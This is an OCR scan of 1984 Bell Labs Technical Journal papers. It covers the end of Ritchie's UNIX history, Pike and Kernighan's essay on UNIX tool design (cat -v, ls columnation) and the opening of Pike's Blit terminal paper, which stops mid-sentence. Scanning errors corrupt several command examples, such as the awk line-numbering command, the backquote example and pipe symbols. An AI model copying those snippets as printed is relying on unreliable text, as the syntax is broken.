ignite any immediate action. There were several objections to the idea as put: the infix notation seemed too radical (we were too TIME-SHARING 13 accustomed to typing ‘cp x y’ to copy x to y); and we were unable to see how to distinguish command parameters from the input or output files. Also, the one-input one-output model of command execution seemed too confining. What a failure of imagination! Some time later, thanks to Mcllroy’s persistence, pipes were finally installed in the operating system (a relatively simple job), and a new notation was introduced. It used the same characters as for 10 redi- rection. For example, the pipeline above might have been written sort input >pr>opr> The idea is that following a V may be either a file, to specify redirection of output to that file, or a command into which the output of the preceding command is directed as input. The trailing V was needed in the example to specify that the (nonexistent) output of opr should be directed to the console; otherwise the command opr would not have been executed at all; instead a file opr would have been created. The new facility was enthusiastically received, and the term ‘filter' was soon coined. Many commands were changed to make them usable in pipelines. For example, no one had imagined that anyone would want the sort or pr utility to sort or print its standard input if given no explicit arguments. Soon some problems with the notation became evident. Most an- noying was a silly lexical problem: the string after was delimited by blanks, so, to give a parameter to pr in the example, one had to quote: sort input >“pr — 2 w >opr> Second, in attempt to give generality, the pipe notation accepted *<’ as an input redirection in a way corresponding to V; this meant that the notation was not unique. One could also write, for example, opropr> The pipe notation using ‘<’ and V survived only a couple of months; it was replaced by the present one that uses a unique operator to separate components of a pipeline. Although the old notation had a certain charm and inner consistency, the new one is certainly superior. Of course, it too has limitations. It is unabashedly linear, though there are situations in which multiple redirected inputs and outputs are called for. For example, what is the best way to compare the outputs 14 TECHNICAL JOURNAL, OCTOBER 1984 of two programs? What is the appropriate notation for invoking a program with two parallel output streams? I mentioned above in the section on 10 redirection that Multics provided a mechanism by which 10 streams could be directed through processing modules on the way to (or from) the device or file serving as source or sink. Thus it might seem that stream-splicing in Multics was the direct precursor of UNIX pipes, as Multics 10 redirection certainly was for its UNIX version. In fact I do not think this is true, or is true only in a weak sense. Not only were coroutines well-known already, but their embodiment as Multics spliceable 10 modules re- quired that the modules be specially coded in such a way that they could be used for no other purpose. The genius of the UNIX pipeline is precisely that it is constructed from the very same commands used constantly in simplex fashion. The mental leap needed to see this possibility and to invent the notation is large indeed. IX. HIGH-LEVEL LANGUAGES Every program for the original PDP-7 UNIX was written in assem- bly language, and bare assembly language it was — for example, there were no macros. Morever, there was no loader or link-editor, so every program had to be complete in itself. The first interesting language to appear was a version of McClure’s TMG 11 that was implemented by Mcllroy. Soon after TMG became available, Thompson decided that we could not pretend to offer a real computing service without Fortran, so he sat down to write a Fortran in TMG. As I recall, the intent to handle Fortran lasted about a week. What he produced instead was a definition of and a compiler for the new language B. 12 B was much influenced by the BCPL language; 13 other influences were Thompson’s taste for spartan syntax, and the very small space into which the compiler had to fit. The compiler produced simple interpretive code; although it and the programs it produced were rather slow, it made life much more pleasant. Once interfaces to the regular system calls were made available, we began once again to enjoy the benefits of using a reasonable language to write what are usually called ‘systems programs’: compilers, assemblers, and the like. (Although some might consider the PL/I we used under Multics unreasonable, it was much better than assembly language.) Among other programs, the PDP-7 B cross-compiler for the PDP-11 was written in B, and in the course of time, the B compiler for the PDP-7 itself was transliterated from TMG into B. When the PDP-11 arrived, B was moved to it almost immediately. In fact, a version of the multi-precision ‘desk calculator’ program dc was one of the earliest programs to run on the PDP-11, well before TIME-SHARING 15 the disk arrived. However, B did not take over instantly. Only passing thought was given to rewriting the operating system in B rather than assembler, and the same was true of most of the utilities. Even the assembler was rewritten in assembler. This approach was taken mainly because of the slowness of the interpretive code. Of smaller but still real importance was the mismatch of the word-oriented B language with the byte-addressed PDP-11. Thus, in 1971, work began on what was to become the C language. 14 The story of the language developments from BCPL through B to C is told elsewhere, 15 and need not be repeated here. Perhaps the most important watershed occurred during 1973, when the operating system kernel was rewritten in C. It was at this point that the system assumed its modern form; the most far-reaching change was the introduction of multi-programming. There were few externally-visible changes, but the internal structure of the system became much more rational and general. The success of this effort convinced us that C was useful as a nearly universal tool for systems programming, instead of just a toy for simple applications. Today, the only important UNIX program still written in assembler is the assembler itself; virtually all the utility programs are in C, and so are most of the applications programs, although there are sites with many in Fortran, Pascal, and Algol 68 as well. It seems certain that much of the success of UNIX follows from the readability, modifiabil- ity, and portability of its software that in turn follows from its expression in high-level languages. X. CONCLUSION One of the comforting things about old memories is their tendency to take on a rosy glow. The programming environment provided by the early versions of UNIX seems, when described here, to be ex- tremely harsh and primitive. I am sure that if forced back to the PDP- 7 I would find it intolerably limiting and lacking in conveniences. Nevertheless, it did not seem so at the time; the memory fixes on what was good and what lasted, and on the joy of helping to create the improvements that made life better. In ten years, I hope we can look back with the same mixed impression of progress combined with continuity. XI. ACKNOWLEDGMENTS I am grateful to S. P. Morgan, K. Thompson, and M. D. Mcllroy for providing early documents and digging up recollections. Because I am most interested in describing the evolution of ideas, this paper attributes ideas and work to individuals only where it seems 16 TECHNICAL JOURNAL, OCTOBER 1984 most important. The reader will not, on the average, go far wrong if he reads each occurrence of ‘we’ with unclear antecedent as ‘Thomp- son, with some assistance from me.’ REFERENCES 1. D. M. Ritchie and K. Thompson, “The UNIX Time-Sharing System,” Comm. Assoc. Comp. Mach., 17, No. 7 (July 1974), pp. 365-75. 2. L. P. Deutsch and B. W. Lampson, “SDS 930 Time-sharing System Preliminary Reference Manual,” Doc. 30.10.10, Project GENIE, Univ. Cal. at Berkeley (April 1965). 3. R. J. Feiertag and E. I. Organick, “The Multics Input-Output System,” Proc. Third Symposium on Operating Systems Principles, October 18-20, 1971, pp. 35-41. 4. The Multiplexed Information and Computing Service; Programmers’ Manual, Mas- sachusetts Institute of Technology Project MAC, Cambridge, MA (1969). 5. K. Thompson, “UNIX Time-Sharing System: UNIX Implementation,” B.S.T.J., 57, No. 6 (July-August 1978), pp. 26-41.. 6. S. C. Johnson and D. M. Ritchie, “UNIX Time-Sharing System: Portability of C Programs and the UNIX System,” B.S.T.J., 57, No. 6 (July-August 1978), pp. pp. 114-141. 7. B. W. Kernighan, M. E. Lesk, and J. F. Ossanna, “UNIX Time-Sharing System: Document Preparation,” B.S.T.J., 57, No. 6 (July-August 1978), pp. 2115-35. 8. B. W. Kernighan and L. L. Cherry, “A System for Typesetting Mathematics,” Commun. ACM 18, No. 3 (March 1975), pp. 151-7. 9. M. E. Lesk and B. W. Kernighan, “Computer Typesetting of Technical Journals on UNIX,” Proc. AFIPS NCC 46, (1977), pp. 879-88. 10. Systems Programmers Manual for the Dartmouth Time Sharing System for the GE 635 Computer, Dartmouth College, Hanover, New Hampshire: 1971. 11. R. M. McClure, “TMG — a Syntax Directed Compiler,” Proc. 20th ACM National Conf. (1965), pp. 262-74. 12. S. C. Johnson and B. W. Kernighan, “The Programming Language B,” Comp. Sci. Tech. Rep. No. 8, Bell Laboratories, Murray Hill, New Jersey (January 1973). 13. M. Richards, “BCPL: A Tool for Compiler Writing and Systems Programming,” Proc. AFIPS SJCC 34 (1969), pp. 557-66. 14. B. W. Kernighan and D. M. Ritchie, The C Programming Language, Englewood Cliffs, NJ: Prentice-Hall, 1978. 15. D. M. Ritchie, S. C. Johnson, M. E. Lesk, and B. W. Kernighan, “UNIX Time- Sharing System: The C Programming Language,” B.S.T.J., 57, No. 6 (July- August 1978), pp. 85-113. AUTHOR Dennis M. Ritchie, B.A. (Physics), 1963, Ph.D. (Applied Mathematics), 1968, Harvard University; AT&T Bell Laboratories, 1968 — . The subject of Mr. Ritchie’s doctoral thesis was subrecursive hierarchies of functions. Since joining AT&T Bell Laboratories, he has worked on the design of computer languages and operating systems. After contributing to the Multics™ project, he joined K. Thompson in the creation of the UNIX operating system, and designed and implemented the C language, in which the system is written. In 1982 he shared the IEEE Emmanuel Piore aware with Thompson, and in 1983 he and Thompson won the ACM Turing award. His current research is concerned with the structure of operating systems. TIME-SHARING 17 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: Program Design in the UNIX Environment By R. PIKE* and B. W. KERNIGHAN* (Manuscript received October 11, 1983) Much of the power of the UNIX ™ operating system comes from a style of program design that makes programs easy to use and, more importantly, easy to combine with other programs. This style is distinguished by the use of software tools, and depends more on how the programs fit into the program- ming environment — how they can be used with other programs — than on how they are designed internally. But as the system has become commercially successful and has spread widely, this style has often been compromised, to the detriment of all users. Old programs have become encrusted with dubious features. Newer programs are not always written with attention to proper separation of function and design for interconnection. This paper discusses the elements of program design, showing by example good and bad design, and indicates some possible trends for the future. I. INTRODUCTION The UNIX operating system has become a great commercial success, and is likely to be the standard operating system for microcomputers and some mainframes in the coming years. There are good reasons for this popularity. One is portability: the operating system kernel and the applications programs are written in the programming language C, and thus can be moved from one type * AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. of computer to another with much less effort than would be involved in recreating them in the assembly language of each machine. Essen- tially, the same operating system therefore runs on a wide variety of computers, and users need not learn a new system when new hardware comes along. Perhaps more important, vendors who sell the UNIX system need not provide new software for each new machine; instead, their software can be compiled and run without change on any hard- ware, which makes the system commercially attractive. There is also an element of zealotry: users of the system tend to be enthusiastic and to expect it wherever they go; the students who used the UNIX system in universities a few years ago are now in the job market and often demand it as a condition of employment. But the UNIX system was popular long before it was even portable, let alone a commercial success. The reasons for that are more inter- esting. Except for the initial PDP-7* version, the UNIX system was written for the PDP-11* computer, which was deservedly very popular. The PDP-11 computers were powerful enough to do real computing, but small enough to be affordable by small organizations such as academic departments in universities. The early UNIX system was smaller but more effective, and tech- nically more interesting, than competing systems on the same hard- ware. It provided a number of innovative applications of computer science, showing the benefits to be obtained by a judicious blend of theory and practice. Examples include the yacc parser-generator, the di f f file comparison program, and the pervasive use of regular expres- sions to describe string patterns. These led in turn to new program- ming languages and interesting software for applications like program development, document preparation, and circuit design. Since the system was modest in size, and since essentially everything was written in C, the software was easy to modify, to customize for particular applications, or merely to support a view of the world different from the original. (This ease of change is also a weakness, of course, as evidenced by the plethora of different versions of the system.) Finally, the UNIX system provided a new style of computing, a new way of thinking of how to attack a problem with a computer. This style was based on the use of tools: using programs separately or in combination to get a job done, rather than doing it by hand, by monolithic self-sufficient subsystems, or by special-purpose, one-time programs. This has been much discussed in the literature, so we don’t need to repeat it here; see Ref. 1, for example. * Trademark of Digital Equipment Corporation. PROGRAM DESIGN 19 11/3/71 CAT (I) NAME cat — concatenate and print SYNOPSIS cat filel . . . DESCRIPTION cat reads each file in sequence and writes it on the standard output stream. Thus: cat file is about the easiest way to print a file. Also: cat filel file2 >file3 is about the easiest way to concatenate files. If no input file is given cat reads from the standard input file. FILES SEE ALSO pr, cp DIAGNOSTICS none; if a file cannot be found it is ignored. BUGS OWNER ken, dmr Fig. 1 — Manual page for cat, UNIX 1st edition, November 1971. II. AN EXAMPLE: CAT The style of use and design of the tools on the system are closely related. The style is still evolving, and is the subject of this essay: in particular, how the design and use of a program fit together, how the tools fit into the environment, and how the style influences solutions to new problems. The focus of the discussion is a single example, the program cat, which concatenates a set of files onto its standard output. Cat is simple, both in implementation and in use; it is essential to the UNIX system, and it is a good illustration of the kinds of decisions that delight both supporters and critics of the system. (Often a single property of the system will be taken as an asset or as a fault by different audiences; our audience is programmers, because the UNIX environment is designed fundamentally for programming.) Even the name cat is typical of UNIX program names: it is short, pronounce- able, but not conventional English for the job it does. (For an opposing viewpoint, see Ref. 2.) Most important, though, cat in its usages and variations exemplifies UNIX program design style and how it has been interpreted by different communities. Figure 1 is the manual page for cat from the UNIX 1st edition* manual. Evidently, cat copies its input to its output. The input is normally taken from a sequence of one or more files, but it can come * The 1st through 7th editions of the UNIX operating system are research versions of the system. Systems I through V are commercial releases of the UNIX system. 20 TECHNICAL JOURNAL, OCTOBER 1984 from the standard input. The output is the standard output. The manual suggested two uses, the general file copy: cat filel file2 >file3 and printing a file on the terminal: cat file The general case is certainly what was intended in the design of the program. Output redirection (provided by the > operator, implemented by the UNIX shell) makes cat a fine general-purpose file concatenator and a valuable adjunct for other programs, which can use cat to process filenames, as in: cat file f ile2 * • • J other-program The fact that cat will also print on the terminal is a special case. Perhaps surprisingly, in practice it turns out that the special case is the main use of the program.* The design of cat is typical of most UNIX programs: it implements one simple but general function that can be used in many different applications (including many not envisioned by the original author). Other commands are used for other functions. For example, there are separate commands for file system tasks like renaming files, deleting them, or telling how big they are. Other systems instead lump these into a single “file system” command with an internal structure and command language of its own. (The PIP file copy program found on CP/M 1 or RSX-11* operating systems is an example.) That approach is not necessarily worse or better, but it is certainly against the UNIX philosophy. Unfortunately, such programs are not completely alien to the UNIX system — some mail-reading programs and text editors, for example, are large self-contained “subsystems” that provide their own complete environments and mesh poorly with the rest of the system. Most such subsystems, however, are usually imported from or inspired by programs on other operating systems with markedly different programming environments. III. CAT -v There are some significant advantages to the traditional UNIX system approach. The most important is that the surrounding envi- *The use of cat to feed a single input file to a program has to some degree superseded the shell’s < operator, which illustrates that general-purpose constructs — like cat and pipes — are often more natural than convenient special-purpose ones. f Trademark of Digital Research Inc. * Trademark of Digital Equipment Corporation. PROGRAM DESIGN 21 The Moffett Library Midwestern State University Wichita Falls, Texas ronment— the shell and the programs it can invoke — provides a uni- form access to system facilities. File name argument patterns are expanded by the shell for all programs, without prearrangement in each command. The same is true of input and output redirection. Pipes are a natural outgrowth of redirection. Rather than decorate each command with options for all relevant pre- and post-processing, each program expects as input, and produces as output, concise and header-free textual data that connect well with other programs to do the rest of the task at hand. It takes some programming discipline to build a program that works well in this environment — primarily, to avoid the temptation to add features that conflict with or duplicate services provided by other commands — but it’s well worthwhile. Growth is easy when the functions are well separated. For example, the 7th edition shell was augmented with a backquote operator that converts the output of one program into the arguments to another, as in cat cat filelist No changes were made in any other program when this operator was invented; because the backquote is interpreted by the shell, all pro- grams called by the shell acquire the feature transparently and uni- formly. If special characters like backquotes were instead interpreted, even by calling a standard subroutine, by each program that found the feature appropriate, every program would require at least recompila- tion whenever someone had a new idea. Not only would uniformity be hard to enforce, but experimentation would be harder because of the effort of installing any changes. The UNIX 7th edition system introduced two changes in cat. First, files that could not be read, either because of denied permissions or simple nonexistence, were reported rather than ignored. Second, and less desirable, was the addition of a single optional argument -u, which forced cat to unbuffer its output (the reasons for this option, which has disappeared again in the 8th edition of the system, are technical and irrelevant here.) But the existence of one argument was enough to suggest more, and other versions of the system soon embellished cat with features. This list comes from cat on the Berkeley distribution of the UNIX system: -s Strip multiple blank lines to a single instance. -n Number the output lines. — b Number only the nonblank lines. — v Make nonprinting characters visible. -ve Mark ends of lines. — vt Change representation of tab. 22 TECHNICAL JOURNAL, OCTOBER 1984 In System V, there are similar options and even a clash of naming: -s instructs cat to be silent about nonexistent files. But none of these options is an appropriate addition to cat; the reasons get to the heart of how UNIX programs are designed and why they work well together. It’s easy to dispose of (Berkeley) -s, -n, and -b: all of these jobs are readily done with existing tools like sed and awk. For example, to number lines, this awk invocation suffices: awk ' ! print nr "\t" $0 j ' filenames If line numbering is needed often, this command can be packaged under a name like linenumber and put in a convenient public place. Another possibility is to modify the pr command, whose job is to format text such as program source for output on a line printer. Numbering lines is an appropriate feature in pr; in fact UNIX System V pr has a -n option to do so. There never was a need to modify cat; these options are gratuitous tinkering. But what about -v? That prints nonprinting characters in a visible representation. Making strange characters visible is a genuinely new function for which no existing program is suitable, (“sed -n l”, the closest standard possibility, aborts when given very long input lines, which are more likely to occur in files containing nonprinting char- acters.) So isn’t it appropriate to add the -v option to cat to make strange characters visible when a file is printed? The answer is “No”. Such a modification confuses what cat’s job is — concatenating files — with what it happens to do in a common special case, showing a file on the terminal. A UNIX program should do one thing well, and leave unrelated tasks to other programs. Cat’s job is to collect the data in files. Programs that collect data shouldn’t change the data; cat therefore shouldn’t transform its input. The preferred approach in this case is a separate program that deals with nonprintable characters. We called ours vis (a suggestive, pro- nounceable, non-English name) because its job is to make things visible. As usual, the default is to do what most users will want — make strange characters visible — and as necessary include options for vari- ations on that theme. By making vis a separate program, related useful functions are easy to provide. For example, the option -s strips out (i.e., discards) strange characters, which is handy for dealing with files from other operating systems. Other options control the treatment and format of characters like tabs and backspaces that may or may not be considered strange in different situations. Such options make sense in vis because its focus is entirely on the treatment of such characters. In cat, they require an entire sublanguage within the -v option, and thus get even further away from the fundamental purpose of that program. Also, providing the function in a separate program PROGRAM DESIGN 23 makes convenient options such as — s easier to invent, because it isolates the problem as well as the solution. One possible objection to separate programs for each task is effi- ciency. For example, if we want numbered lines and visible characters, it is probably more efficient to run the one command cat — n —v file than the two-element pipeline linenumber file ] vis In practice, however, cat is usually used with no options, so it makes sense to have the common cases be the efficient ones. The current research version of the cat command is actually about five times faster than the Berkeley and System V versions because it can process data in large blocks instead of the byte-at-a-time processing that might be required if an option is enabled. Also, and this is perhaps more important, it is hard to imagine any of these examples being the bottleneck of a production program. Most of the real time is probably taken waiting for the user’s terminal to display the characters, or even for the user to read them. Separate programs are not always better than wider options; which is better depends on the problem. Whenever one needs a way to perform a new function, one faces the choice of whether to add a new option or write a new program (assuming that none of the program- mable tools will do the job conveniently). The guiding principle for making the choice should be that each program does one thing. Options are appropriately added to a program that already has the right functionality. If there is no such program, then a new program is called for. In that case, the usual criteria for program design should be used: the program should be as general as possible, its default behavior should match the most common usage, and it should coop- erate with other programs. IV. FAST TERMINAL LINES Let’s look at these issues in the context of another problem, dealing with fast terminal lines. The first versions of the UNIX system were written in the days when 150 baud was “fast” and all terminals used paper. Today, 9600 baud is typical, and hard-copy terminals are rare. How should we deal with the fact that output from programs like cat scrolls off the top of the screen faster than one can read it? There are two obvious approaches. One is to tell each program about the properties of terminals, so it does the right thing (whether by option or automatically). The other is to write a command that handles terminals, and leave most programs untouched. 24 TECHNICAL JOURNAL, OCTOBER 1984 An example of the first approach is Berkeley's version of the is command, which lists the file names in a directory. Let us call it lsc to avoid confusion. The 7th edition is command lists file names in a single column, so for a large directory, the list of file names disappears off the top of the screen at great speed. The lsc command prints in columns across the screen (which is assumed to be 80 columns wide), so there are typically four to eight times as many names on each line, and thus the output usually fits on one screen. The option -1 can be used to get the old single-column behavior. Surprisingly, lsc operates differently if its output is a file or pipe: lsc produces output different from lsc j cat The reason is that lsc begins by examining whether its output is a terminal, and prints in columns only if it is. By retaining single- column output to files or pipes, lsc ensures compatibility with pro- grams like grep or wc, which expect things to be printed one per line. This ad hoc adjustment of the output format depending on the desti- nation is not only distasteful, it is unique — no standard system com- mand has this property. A more insidious problem with lsc is that the columnation facility, which is actually a useful, general function, is built in and thus inaccessible to other programs that could use a similar compression. Programs should not attempt special solutions to general problems. The automatic columnation in lsc is reminiscent of the “wild cards” found in some systems that provide file name pattern matching only for a particular program. The experience with centralized processing of wild cards in the system shell shows overwhelmingly how important it is to centralize the function where it can be used by all programs. One solution for the l s problem is obvious — a separate program for columnation, so that columnation into, say, five columns is just is | 5 It is easy to build a first-draft version with the multicolumn option of pr. The commands 2,3, etc., are all links to a single file: pr — $0 — t — 1 1 $* $0 is the program name (2,3, etc.), so -$o becomes —n, where n is the number of columns that pr is to produce. The other options suppress the normal heading, set the page length to one line, and pass the arguments on to pr. This implementation is typical of the use of tools — it takes only a moment to write, and it serves perfectly well for PROGRAM DESIGN 25 most applications. If a more general service is desired, such as auto- matically selecting the number of columns for optimal compaction, a C program is probably required, but the one-line implementation above satisfies the immediate need and provides a base for experimentation with the design of a fancier program, should one become necessary. Similar reasoning suggests a solution for the general problem of data flowing off screens (columnated or not): a separate program to take any input and print it a screen at a time. Such programs are by now widely available, under names like pg and more. This solution affects no other programs, but can be used with all of them. As usual, once the basic feature is right, the program can be enhanced with options for specifying screen size, backing up, searching for patterns, and anything else that proves useful within that basic job. There is still a problem, of course. If the user forgets to pipe output into pg, the output that goes off the top of the screen is gone. It would be desirable if the facilities of pg were always present without having to be requested explicitly. There are related useful functions that are typically only available as part of a particular program, not in a central service. One example is the history mechanism provided by some versions of the UNIX shell: commands are remembered, so it’s possible to review and repeat them, perhaps with editing. But why should this facility be restricted to the shell? (It’s not even general enough to pass input to programs called by the shell; it applies to shell commands only.) Certainly other programs could profit as well; any interactive program could benefit from the ability to re-execute commands. More subtly, why should the facility be restricted to program input ? Pipes have shown that the output from one program is often useful as input to another. With a little editing, the output of commands such as Is or make can be turned into commands or data for other programs. Another facility that could be usefully centralized is typified by the editor escape in some mail commands. It is possible to pick up part of a mail message, edit it, and then include it in a reply. But this is all done by special facilities within the mall command and so its use is restricted. Each such service is provided by a different program, which usually has its own syntax and semantics. This is in contrast to features such as pagination, which is always the same because it is only done by one program. The editing of input and output text is more environmental than functional; it is more like the shell’s expansion of file name metacharacters than automatic numbering of lines of text. But since the shell does not see the characters sent as input to the programs, it cannot provide such editing. The emacs editor provides a limited form of this capability, by processing all system command input and output, 26 TECHNICAL JOURNAL, OCTOBER 1984 but this is expensive, clumsy, and subjects the users to the complexities and vagaries of yet another massive subsystem (which isn’t to criticize the inventiveness of the idea). A potentially simpler solution is to let the terminal or terminal interface do the work, with controlled scrolling, editing and retrans- mission of visible text, and review of what has gone before. We have used the programmability of the Blit terminal 3 — a programmable bitmap graphics display — to capitalize on this possibility, to good effect. The Blit uses a mouse to point to characters on the display, which can be edited, rearranged, and transmitted back to the UNIX system as though they had been typed on the keyboard. Because the terminal is essentially simulating typed input, the programs are oblivious to how the text was created; all the features discussed above are provided by the general editing capabilities of the terminal, with no changes to the UNIX programs. There are some obvious direct advantages to the Blit’s ability to process text under the user’s control. Shell history is trivial: commands can be selected with the mouse, edited if desired, and retransmitted. Since from the terminal’s viewpoint all text on the display is equiva- lent, history is limited neither to the shell nor to command input. Because the Blit provides editing, most of the interactive features of programs like mail are unnecessary; they are done easily, transpar- ently, and uniformly by the terminal. The most interesting facet of this work, however, is the way it removes the need for interactive features in programs; instead, the Blit is the place where interaction is provided, much as the shell is the program that interprets file name matching metacharacters. Unfor- tunately, of course, programming the terminal demands access to a part of the environment that is off limits to most programmers, but the solution meshes well with the environment and is appealing in its simplicity. If the terminal cannot be modified to provide the capabil- ities, a user-level program or perhaps the UNIX system kernel itself could be modified fairly easily to do roughly what the Blit does, with similar results. V. CONCLUSIONS The key to problem solving on the UNIX system is to identify the right primitive operations and to put them at the right place. UNIX programs tend to solve general problems rather than special cases. In a very loose sense, the programs are orthogonal, spanning the space of jobs to be done (although with a fair amount of overlap for reasons of history, convenience, or efficiency). Functions are placed where they will do the most good: there shouldn’t be a pager in every program PROGRAM DESIGN 27 that produces output any more than there should be file name pattern matching in very program that uses file names. One thing that the UNIX system does not need is more features. It is successful in part because it has a small number of good ideas that work well together. Merely adding features does not make it easier for users to do things — it just makes the manual thicker. The right solution in the right place is always more effective "than haphazard hacking. REFERENCES 1. B. W. Kernighan and R. Pike, The UNIX Programming Environment , Englewood Cliffs, NJ: Prentice-Hall, 1984. 2. D. Norman, “The Truth about UNIX ,” Datamation, 27, No. 12 (November 1981). 3. R. Pike, “The UNIX System: The Blit: A Multiplexed Graphics Terminal,” AT&T Bell Lab. Tech. J., this issue. AUTHORS Brian W. Kernighan, B.A.Sc., 1964, University of Toronto; Ph.D., 1969, Princeton University; AT&T Bell Laboratories, 1969 — . Mr. Kernighan has been involved with heuristics for combinatorial optimization problems, pro- gramming methodology, software for document preparation, and network optimization. Mr. Kernighan is Head of the Computing Structures Research department, where he has worked in the areas of combinatorial optimization and heuristics, design automation, document preparation systems, program- ming languages, and software tools. Member, IEEE and ACM. Rob Pike, AT&T Bell Laboratories, 1980—. As a Member of Technical Staff, Mr. Pike’s best-known work at Bell Laboratories has been as co-developer of the Blit bitmap graphics terminal. His research interests include statistical mechanics and cosmology; his practical interests involve interactive graphics hardware and software. 28 TECHNICAL JOURNAL, OCTOBER 1984 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: The Blit: A Multiplexed Graphics Terminal ByR. PIKE* (Manuscript received August 1, 1983) The Blit is a programmable bitmap graphics terminal designed specifically to run with the UNIX ™ operating system. The software in the terminal provides an asynchronous multiwindow environment, and thereby exploits the multiprogramming capabilities of the UNIX system, which have been largely under-utilized because of the restrictions of conventional terminals. This paper discusses the design motivation of the Blit, gives an overview of the user interface, mentions some of the novel uses of multiprogramming made possible by the Blit, and describes the implementation of the multiplexing facilities on the host and in the terminal. Because most of the functionality is provided by the terminal, the discussion focuses on the structure of the terminal’s software. I. INTRODUCTION The BliU is a graphics terminal characterized more by the software it runs than by the hardware itself. The hardware is simple and inexpensive (see Fig. 1): 256K bytes of memory dual-ported between an 800-by-1024-by-l-bit display and a Motorola MC68000 micro- processor, with 24K of ROM, an RS-232 interface, a mouse, and a keyboard. Unlike many graphics terminals, it has no special-purpose graphics hardware; instead, the microprocessor executes all graphical * AT&T Bell Laboratories. f The name comes from the second syllable of the bitblt graphics operator. 1,2 It is not an acronym. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information- service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 29 Fig. 1 — Hardware overview. operations in software. The reasons for, and consequences of, this design are discussed elsewhere. 2 The microprocessor can be loaded from the host with custom appli- cations software, but the terminal is rarely used this way. Instead, a small multiprocess operating system is loaded into the terminal, and the processes under that operating system are then loaded. The operating system is structured around asynchronous overlapping win- dows, called layers. 3 Layers extend the idea of a bitmap and the bi tbit operator 1,2 to overlapping areas of the display, so a program may draw in its portion of the screen independently of other programs sharing the display. The Blit screen is therefore much like a set of truly independent, asynchronously updated terminals. This structure nicely complements the multiprogramming capabilities of the UNIX system and has led to some new insights about multiprogramming environ- ments. Programs in the terminal have access to an extensive bitmap graph- ics library, which is implemented using the layerop primitive, 3 and is distinct in its use of abstract data types for geometrical objects and its lack of device independence — the library is closely coupled to the terminal and its programming environment. 2 The programs that have been written for the Blit include a popular text editor with a paucity of commands, a debugger that can be used effectively without reading any documentation, a surfeit of 24-by-80-character terminal emula- tors, and not nearly enough games. But this paper is not about the programs in the terminal so much as their environment and interre- lationships. Reference 3 discusses how to update overlapping windows asynchronously; this paper discusses what to do with them. The discussion is in three main sections: an overview of the history and motivation behind the terminal, a brief description of the user interface, and some details of the implementation. The reader is assumed to have some familiarity with the UNIX operating system, although the details relevant to the Blit will be discussed. H. HISTORY AND MOTIVATION The original idea behind the development of the Blit hardware was 30 TECHNICAL JOURNAL, OCTOBER 1984 to provide a graphics machine with about the power of the Xerox Alto, 4 but using 1981 technology (large address space microprocessors, 64K RAMs, and programmed array logic) to keep size, complexity, and, particularly, cost much lower. Too many graphics work stations are so expensive that several people must share one, sometimes using sign-up lists. Because we refuse to have rotating machinery in our offices, we wanted to build the Blit around a network interface rather than a disc. But after several lengthy discussions we decided that network hard- ware and software were not yet inexpensive, available, or reliable enough to be the center of a work station (the situation now is hardly better). Rather than compromise our principles, and to keep costs low, we therefore chose to make the Blit a regular terminal with an RS- 232 Electronic Industries Association (EIA) port to a time-shared host. Only one integrated circuit is needed to connect the micropro- cessor to the EIA line, so the electronics fits on a single board, which minimizes cost, size, and packaging complexity — the board mounts inside the monitor cabinet. This decision to use RS-232 limited the high end of the capabilities of the Blit, but it expanded the low end enormously. Blits can be used anywhere 24-by-80 ASCII terminals are used, including each office in our research center. But perhaps most important (at least to us), Blits are inexpensive, portable, and so easy to communicate with that we can take them home. Researchers in our group have 1200-baud dial-up terminals at home. For the home computing environment to be effective, it must be as similar to the office environment as possible; although 1200 baud is slow (our terminals at work run at 19,200 baud), a Blit at 1200 baud is much better than a regular terminal at 1200 baud. Also, the local processing power of the terminal can make up for some of the reduced bandwidth. So although a high-speed network would be desirable, much of the Blit’s success can be attributed to the use of RS-232. We initially intended to use the Blit to explore interactive graphical environments along the lines of Smalltalk, but soon decided that we had neither the energy nor the inclination to build a complete pro- gramming environment. The UNIX system has a comfortable set of tools for program development and general programming that would require great effort to reproduce, but that we wanted to use when developing and using the Blit. Also, the UNIX system is the framework of all computing done in our group and is not likely to be supplanted easily by something new, no matter how attractive. We therefore began thinking about using the Blit to improve the programming environment, rather than replace or even merely add to it. One of the distinguishing characteristics of the UNIX system is multiprogramming, the ability to run several programs at once. The best known use of multiprogramming is the pipe, an I/O connection GRAPHICS TERMINAL 31 between two processes that sends the output from one process to the input of another. The UNIX command interpreter, called the shell, has a simple syntax for pipes: who j lpr which sends the output of who to the lpr command, which spools output for the line printer. Programs in a pipeline are related by their interconnection, but the UNIX system also allows unrelated processes to execute simultane- ously. The shell postfix operator s runs a command in the background, that is, without waiting for it to finish. For example, cc prog . c & runs the C compiler on the file prog.c and immediately returns to the user; normally, the shell would wait for cc to complete before reading the next command from the terminal. Background processes have their input disconnected from the terminal, but messages printed on the terminal will appear there, asynchronously with other input and output on the same terminal. This can be annoying if a process using the terminal interactively is maintaining a full-screen image, because output from background processes will modify the screen image without the foreground process’s knowledge. For example, error messages from a background cc will interfere with a screen editor. The problem exists because several processes are using a single terminal for their I/O. If the terminal were multiplexed between the processes, their input and output could be kept separate. The “job control” software 5 developed by Jim Kulp at International Institute for Applied Systems Analysis in Vienna and Bill Joy at the University of California at Berkeley allows the user to pass the terminal between processes on the same terminal, essentially by flipping processes from the background to the foreground at the user’s signal. But the state of the terminal is not maintained correctly when the user flips between processes — the screen contents and terminal modes are not restored to those of the new foreground process. The problem is resolved by interfacing the editors to the job control mechanism so they can preserve the screen’s appearance; but that is far from transparent to the programs. To provide a better terminal for use by the UNIX system, we began thinking about programming the Blit so each process or related set of processes has a reserved portion of the screen, called a window. That way, compiler error messages appear in the window where the compiler is running, and editing can continue undisturbed in another window. If the terminal maintains the state for the various processes and provides an appropriate user interface for creating and switching between windows, the UNIX system need not have job control or 32 TECHNICAL JOURNAL, OCTOBER 